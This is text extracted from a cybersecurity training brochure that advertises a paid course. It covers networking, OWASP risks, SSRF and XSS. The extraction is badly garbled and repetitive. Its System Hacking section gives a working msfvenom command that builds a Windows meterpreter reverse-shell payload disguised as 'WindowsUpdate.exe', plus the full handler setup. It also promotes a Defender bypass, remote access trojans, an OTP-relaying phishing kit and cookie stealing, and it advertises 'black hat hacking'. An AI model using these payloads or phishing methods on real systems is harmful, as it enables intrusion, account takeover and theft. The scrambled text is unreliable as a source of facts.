Drop Certified Security Course PDF
Drop Certified Security Course PDF
W W W . D R O P . O R G . I N
COURSE FEATURES
4 Months Live Classes
Premium Software Support
ISO Certified Certificate (Hardcopy)
Internship as per eligibility
JOB OPPORTUNITIES
Cybersecurity Analyst
Information Security Manager
Penetration Tester
Digital Forensics Investigator
Cybersecurity Consultant
Network Security Engineer
Cloud Security Engineer
Visit Us :- Drop.org.in
Call Us :- +91 8918100300
HOW TO PREPARE FOR THIS FIELD ?
Education and Certifications Technical Skills Hands-On Experience
Bachelor's Degree Programming Internships
Certifications Networking Personal Projects
Operating Systems Hackathons
Security Tools
www.drop.org.in
Offensive Security
The first large area within Cyber
Security is the offensive side. This area
involves attacking different
applications and technologies to
discover vulnerabilities.
Defensive Security
This is the second major area within
Security. While Offensive Security
involves actively finding vulnerabilities
and misconfigurations within
technologies, Defensive Security involves
detecting and stopping these attacks.
NETWORKING Identifying Devices on a Network
Begin learning the fundamentals of computer Now we can change our name through deed poll,
but we can't, however, change our fingerprints.
networking in this bite -sized and interactive
Every human has an individual set of fingerprints
module. which means that even if they change their name,
there is still an identity behind it. Devices have
the same thing: two means of identification, with
one being permeable.
Ping (ICMP)
Ping is one of the most fundamental network
tools available to us. Ping uses ICMP ( Internet
Control Message Protoc ol) packets to determine
the performance of a connection between
devices, for example, if the connection exists or is
What is Networking? reliable.
IP Addresses
Briefly, an IP address (or Internet Protocol) address Internet Protocol version 6 | IPV6
can be used as a way of identifying a host on a Internet Protocol version 6 is the most recent
network for a period of time, where that IP address version of the Internet Protocol, the
communications protocol that provides an
can then be associated with another device without
identification and location system for computers
the IP address changing. First, let's split up precisely on networks and routes traffic across the
what an IP address is in the diagram below: Internet.
Presentation Layer
The presentation layer receives data from the application
layer.
Session Layer
When the session layer receives the correctly formatted
data from the presentation layer, it looks to see if it can set
up a connection with the other computer across the
network
Transport Layer
The transport layer is a very interesting layer that serves
numerous important functions. Its first purpose is to
Data Link Layer choose the protocol over which the data is to be
The data link layer focuses on the physical addressing transmitted.
of the transmission.
Network Layer
Physical Layer The network layer is responsible for locating the
The physical layer is right down to the hardware of the destination of your request. For example, the Internet is a
computer. This is where the electrical pulses that make up huge network; when you want to request information from
data transfer over a network are sent and received. a webpage,
CIA MODEL | INFORMATION SECURITY
Confidentiality
Av
The Common Information Model is an open standard that defines
y
Integrity
rit
ail
how managed elements in an IT environment are represented as a
eg
ab
common set of objects and relationships between them.
Availability
Int
ilit
Information
y
Security
Confidentiality
Confidentiality
Integrity
Integrity
Availability
Availability
HARDWARE HACKING TOOL
RTL-SDR IMSI Catcher
Wi-Fi Pineapple The RTL-SDR (Software Defined Radio) is a versatile and An IMSI catcher is a device used to intercept mobile phone
The Wi-Fi Pineapple is a portable device affordable radio receiver that uses the RTL2832U chipset. communications by mimicking a legitimate cell tower. It
used by security professionals to test and It enables users to tune into a wide range of radio captures the International Mobile Subscriber Identity
analyze wireless networks. It can mimic frequencies and decode various types of signals, such as (IMSI) of nearby phones, allowing the operator to monitor
legitimate Wi-Fi access points to intercept AM, FM, and digital communications. With software-based calls, texts, and sometimes even track the location of the
and assess network traffic, helping identify processing, it allows for experimentation and exploration devices. While IMSI catchers can be used for legitimate
vulnerabilities and improve security. of radio frequencies beyond traditional broadcasting, purposes by law enforcement and security agencies, they
making it popular among hobbyists and researchers. are also a potential privacy threat if misused.
Responses Cookies
The server should reply with a response. Cookies are small bits of data that are stored in
The response follows a similar structure your browser. Each browser will store them
to the request, but the first line describes separately, so cookies in Chrome won't be
the status rather than a verb and a path. available in Firefox. They have a huge number of
https://tryhackme.com/r/room/w The status will normally be a code, you're uses, but the most common are either session
ebfundamentals probably already familiar with 404: Not management or advertising (tracking cookies).
found. Cookies are normally sent with every HTTP request
made to a server.
SURFACE WEB, DEEP WEB AND DARK WEB
The Surface Web
is what users access in their regular day-to-day
activity. It is available to the general public using
standard search engines and can be accessed using
standard web browsers that do not require any special
configuration, such as Mozilla Firefox, Microsoft’s
Internet Explorer or Edge, and Google Chrome.
The Deep Web
Get a modern PowerPoint Presentation that is
beautifully designed. I hope and I believe that this
Template will your Time, Money and Reputation.
60%
redirects your internet traffic
through a secure tunnel, hiding your
IP address and encrypting your data
in the process. It’s how a VPN keeps
your data private and protects you
from potential cyberattacks
How does it work? When you connect to a VPN service, it
authenticates your client with a VPN server and applies an encryption
protocol to all your internet data. The VPN service then creates an
encrypted “tunnel” over the internet. That secures the data traveling
between you and your destination.
Safe Anonymous
Eaves Wayback
Whois Look Wappalyzer Arp Protocol
-dropping Machine Shodan
2 8
inurl:which finds strings in the URL of a page cache:which displays Google’s cached copy of a page
3 7
4 6
5
site:which restricts a search to a particular site or domain Simple PowerPoint Presentation
Exploit-DB
IMAGE FORENSICS ANALYSIS
Digital
Forensic
Image
Analysis
Network scanning Network scanning refers to the use of a computer network to gather information
regarding computing systems. Network scanning is mainly used for security assessment,
system maintenance, and also for performing attacks by hackers. ... Recognize filtering
systems between the user and the targeted hosts.
Nmap Scanner Nmap is a free and open-source network scanner created by Gordon Lyon. Nmap is used
to discover hosts and services on a computer network by sending packets and analyzing
the responses. Nmap provides a number of features for probing computer networks,
including host discovery and service and operating system detection.
NMAP: THE NETWORK MAPPER SECURITY SCANNER
Nmap provides a number of features for probing computer networks, including host discovery and
service and operating system detection.
W em k )
pa de s
By fendow
in o in
ss r
R
downloadable free anti-spyware is a malware program that uses a
do te g
H (RA
ac T
program for Windows XP, and was later back door for administrative
De in
w
s
W
shipped with Windows Vista and control over the targeted
Windows 7 computer.
ExSpo
MSFVenom om te of
File Extension Spoofer
n
MSFvenom is a penetration testing tool Ve Fi nsi er
F le on
that can be used to generate malicious S More advanced users know that to run
M
code, or payloads, for a variety of an exe in Windows its necessary to use
platforms. It is a combination of two the file extension “.exe”. If a malware
older tools, msfpayload and msfencode, developer wanted to distribute a file
and it offers a number of advantages that was still executable but looked
over its predecessors. like a pdf it would still have to be
called something
SYSTEM HACKING Windows Defender Bypass Windows Defender Bypass
Microsoft Defender Antivirus is an Microsoft Defender Antivirus is an
antimalware component of Microsoft antimalware component of Microsoft
Windows. It was first released as a Windows. It was first released as a
downloadable free anti-spyware downloadable free anti-spyware
Windows Defender Bypass program for Windows XP, and was later program for Windows XP, and was later
shipped with Windows Vista and shipped with Windows Vista and
Windows 7 Windows 7
Windows Remote Hacking (RAT) Windows Defender Bypass Windows Defender Bypass
Microsoft Defender Antivirus is an Microsoft Defender Antivirus is an
antimalware component of Microsoft antimalware component of Microsoft
Windows. It was first released as a Windows. It was first released as a
downloadable free anti-spyware downloadable free anti-spyware
MSFVenom program for Windows XP, and was later program for Windows XP, and was later
shipped with Windows Vista and shipped with Windows Vista and
Windows 7 Windows 7
Silent Exploit
File Extension Spoofer There are multiple Exploit DOC in
Silent DOC Exploit, a package
commonly used by web services to
process Exploit DOC File. One of the
vulnerabilities can lead to remote
Silent Exploit code execution (RCE) if..
Create Payload
msfvenom -p windows/meterpreter/reverse_tcp --platform
windows -a x86 -f exe LHOST=192.168.13.149 LPORT=4444 -o
~/Desktop/WindowsUpdate.exe
Exploit
➢ msfconsole
➢ use Multi/handler
➢ use 5
➢ set payload windows/meterpreter/reverse_tcp
➢ set LHOST 192.168.13.149
➢ set LPORT 4444
➢ exploit
MSFVenom
MSFvenom is a penetration testing tool that can be used to generate malicious code, or
payloads, for a variety of platforms. It is a combination of two older tools, msfpayload
and msfencode, and it offers a number of advantages over its predecessors.
One of the biggest advantages of MSFvenom is that it is a single tool that can be used to
generate payloads for a wide range of platforms. This makes it much easier for
penetration testers to have the right tools at their disposal, and it also reduces the risk
of making mistakes.
SYSTEM HACKING Bypass Windows Login Password Cookie Stealing Attack
Cookie stealing attacks are a type of
Reset Administrator & User
cyberattack that involves stealing a user's
Passwords on Any Windows cookies, which are small files that
without Reformatting or websites use to identify and track users.
Bypass Windows Login Password Reinstalling System. 100%
Cookies can contain sensitive
information, such as a user's login
Success Rate! credentials, which can be used to gain
unauthorized access to a user's account.
AdvPhishing
CamPhish When victim enter his credentials,
you need to go to original website
and use those credentials to send
real OTP to victim. Once he enter
that OTP such OTP will also be there
AdvPhishing ..
ANDROID HACKING
Remote Access Trojan
The Remote Access Trojan (RAT) can
almost be considered the "legacy" tool
of hackers. The RAT is a malware
program that uses a back door for
administrative control over the
targeted computer.
Spynote black edition 7.0
HACKING WIRELESS NETWORKS
What Is WPS WIFI Hacking WIFI NETCUT | Network Hacking
Wi-Fi Protected Setup (WPS) is a WIFI Hacking Using WPS Security you Netcut, invented by arcai.com, is a
feature supplied with many routers. can use to find out if your access tool that protects and manages your
It is designed to make the process of point is vulnerable to WPS protocol. private network. This tool works by
connecting to a secure wireless As usual, the application lets you tracking and manipulating the MAC
network from a computer or other carry out this check on any network, Addresses that are connected to the
device easier. but it’s recommended to use it network.
exclusively on your own.
1
security system that monitors and
Firewall controls incoming and outgoing network
traffic based on predetermined security
rules. A firewall typically establishes a
barrier between a trusted network and an
2
untrusted network, such as the Internet.
Use HTTPS
Use HTTPS
WEB As a consumer, you may already know to
PENETRATION always look for the green lock image and
Testing https in your browser bar any time you
Up-To-Date provide sensitive information to a
3 Up-To-Date Using a CMS with various useful plugins website.
and extensions offers a lot of benefits, but
it also brings risk. The leading cause of
website infections is vulnerabilities in a
4
content management system’s extensible
Don’t help
components.
the hackers
Don’t help the hackers
look out for phishing emails and
other scams.
Broken Access Control
moves up from the fifth position; 94% of applications were tested
for some form of broken access control. The 34 Common
Weakness Enumerations (CWEs) mapped to Broken Access Control
had more occurrences in applications than any other category.
Cryptographic Failures
Security Misconfiguration
moves up from #6 in the previous edition; 90% of applications
were tested for some form of misconfiguration. With more shifts
into highly configurable software, it’s not surprising to see this
category move up. The former category for XML External Entities
(XXE) is now part of this category.
Vulnerable and Outdated Components
was previously titled Using Components with Known
Vulnerabilities and is #2 in the Top 10 community survey, but also
had enough data to make the Top 10 via data analysis. This
category moves up from #9 in 2017 and is a known issue that we
struggle to test and assess …
The OWASP (Open Web Application Security Project) Software and Data Integrity Failures
Top Ten is a list of the most critical security risks to is a new category for 2021, focusing on making
web applications. It's essential for developers and assumptions related to software updates, critical data,
and CI/CD pipelines without verifying integrity. One of
security professionals to understand these risks and the highest
how to mitigate them to build secure web applications.
Here's a brief tutorial covering each of the OWASP Top
Security Logging and Monitoring Failures
was previously Insufficient Logging & Monitoring and is
Ten:
added from the industry survey (#3), moving up from
#10 previously. This category is expanded to include
REQUEST FORGERY
It is common to see applications containing SSRF
behavior together with defenses aimed at preventing
malicious exploitation. Often, these defenses can be
circumvented.
Server-side request forgery (also known as SSRF) is a
SSRF with blacklist-based input filter
web security vulnerability that allows an attacker to
Some applications only allow input that matches, begins
induce the server-side application to make HTTP with, or contains, a whitelist of permitted values. In this
requests to an arbitrary domain of the attacker's situation, you can sometimes circumvent the filter by
exploiting inconsistencies in URL parsing.
choosing.In a typical SSRF attack, the attacker might
cause the server to make a connection to internal-only SSRF with whitelist-based input filter
services within the organization's infrastructure. In Some applications only allow input that matches, begins
other cases, they may be able to force the server to with, or contains, a whitelist of permitted values. In this
situation, you can sometimes circumvent the filter by
connect to arbitrary external systems, potentially exploiting inconsistencies in URL parsing.
leaking sensitive data such as authorization Bypassing SSRF filters via open redirection
credentials. It is sometimes possible to circumvent any kind of
filter-based defenses by exploiting an open
redirection vulnerability
Excessive trust in client-side controls
Why do applications behave in this way, and
implicitly trust requests that come from the
local machine? This can arise for various
reasons:
High-level logic vulnerability
It is common to see applications containing SSRF
behavior together with defenses aimed at preventing
malicious exploitation. Often, these defenses can be
circumvented.
CROSS SITE
web site so that it returns malicious JavaScript to users.
When the malicious code executes inside a victim's
browser, the attacker can fully compromise their
interaction with the application.
SCRIPTING (XSS)
Hence, web parameter tampering
XSS proof of concept
➢ You can confirm most kinds of XSS vulnerability by
injecting a payload that causes your own browser to execute
some arbitrary JavaScript. It's long been common practice
to use the alert() function for this purpose because it's
short, harmless, and pretty hard to miss when it's
attack is possible by manipulating successfully called. In fact, you solve the majority of our
XSS labs by invoking alert() in a simulated victim's browser.
the price using a simple web proxy
➢ Unfortunately, there's a slight hitch if you use Chrome.
tool (Tamper data, burpsuite etc.) or From version 92 onward (July 20th, 2021), cross-origin
iframes are prevented from calling alert(). As these are used
by editing the amount using the to construct some of the more advanced XSS attacks, you'll
sometimes need to use an alternative PoC payload. In this
browser's web inspector tool. Notice scenario, we recommend the print() function. If you're
interested in learning more about this change and why we
the form field called price, which is like print(),
flagged as hidden. ➢ As the simulated victim in our labs uses Chrome, we've
amended the affected labs so that they can also be solved
using print(). We've indicated this in the instructions
wherever relevant.
Reflected cross-site scripting
➢ Reflected XSS is the simplest variety of cross-site
scripting. It arises when an application receives data in
an HTTP request and includes that data within the
immediate response in an unsafe way.
of XSS attacks? JavaScript to read the value from an input field and write
that value to an element within the HTML:
DISCLOSURE (FPD)
The original DirBuster project is inactive. However,
OWASP ZAP team forked it and built a Forced Browse
add-on which can be loaded into ZAP. I have added the
necessary library files so that you can play with it
directly.
Full Path Disclosure (FPD) vulnerabilities enable the
attacker to see the path to the webroot/file. e.g.: DIRB: Web Fuzzer
/home/omg/htdocs/file/. Certain vulnerabilities, such as ➢ DIRB is a Web Content Scanner. It looks for existing
(and/or hidden) Web Objects. It basically works by
using the load_file() (within a SQL Injection) query to launching a dictionary based attack against a web server
view the page source, require the attacker to have the and analyzing the response.
Clickjacking Bug
Clickjacking is an attack that fools users into
thinking they are clicking on one thing when they
are actually clicking on another. Its other name,
user interface (UI) redressing, better describes
what is going on. Users think they are using a web
page’s normal UI, but in fact there is a hidden UI in
control; in other words, the UI has been redressed.
When users click something they think is safe, the
hidden UI performs a different action.
<iframe src="https://google.com"
width="800" height="800"></iframe>
SSL | HTTPS | HOW TO SETUP
Secure Sockets Layer (SSL) is a security protocol that provides privacy, authentication, and
integrity to Internet communications. SSL eventually evolved into Transport Layer Security (TLS).
HTTP VS HTTPS
90%
capabilities to your application that works on top of an
open standard. It supports video, voice, and generic
data to be sent between peers, allowing developers to
build powerful voice- and video-communication
solutions. The technology is available on all modern
browsers as well as on native clients for all major
platforms.
There are many different use-cases for WebRTC, from basic web apps that
uses the camera or microphone, to more advanced video-calling
applications and screen sharing. We have gathered a number of code
samples to better illustrate how the technology works and what you can
use it for.
IDENTITY SYSTEM
Browser Fingerprinting User Agent Browser
A device fingerprint or machine In computing, a user agent is any
fingerprint is information software, acting on behalf of a
Data Information
collected about the software user, which "retrieves, renders
and hardware of a remote and facilitates end-user
computing device for the interaction with Web content." A
purpose of identification. The user agent is therefore a special
information is usually Connect Alert kind of software agent. Some
assimilated into a brief identifier prominent examples of user
using a fingerprinting algorithm agents are web browsers and
email readers.
TOR BROWSER
Anonymous Identity
Defend yourself
Tor Browser isolates each website you visit so third-
party trackers and ads can't follow you. Any cookies
automatically clear when you're done browsing. So
will your browsing history.
c
IPLogger Canarytokens Find My Device
IP Logger is a URL Shortener with Canarytokens is a free tool that helps Find My Device easily lets you
advanced analytics for the traffic you discover you've been breached by remotely track, lock, and erase the
through your links, visitors on your having attackers announce data on a lost or stolen phone. You
blog, forum or website. With the help themselves. The tokens allow you to can also see the battery life remaining
of our services, you can find your IP implant traps on your phone and the Wi-Fi network
address, find location of IP address, it is connected to. There are other
and track the exa…. ways to track a lost Android phone,
CV DESIGN
** brief**
HOW APPLY FOR JOB IN
LINKEDIN
** brief**
BLACK HAT HACKING
(BHH)
We have another very important course where you can learn black hat hacking
and take your skills a step further.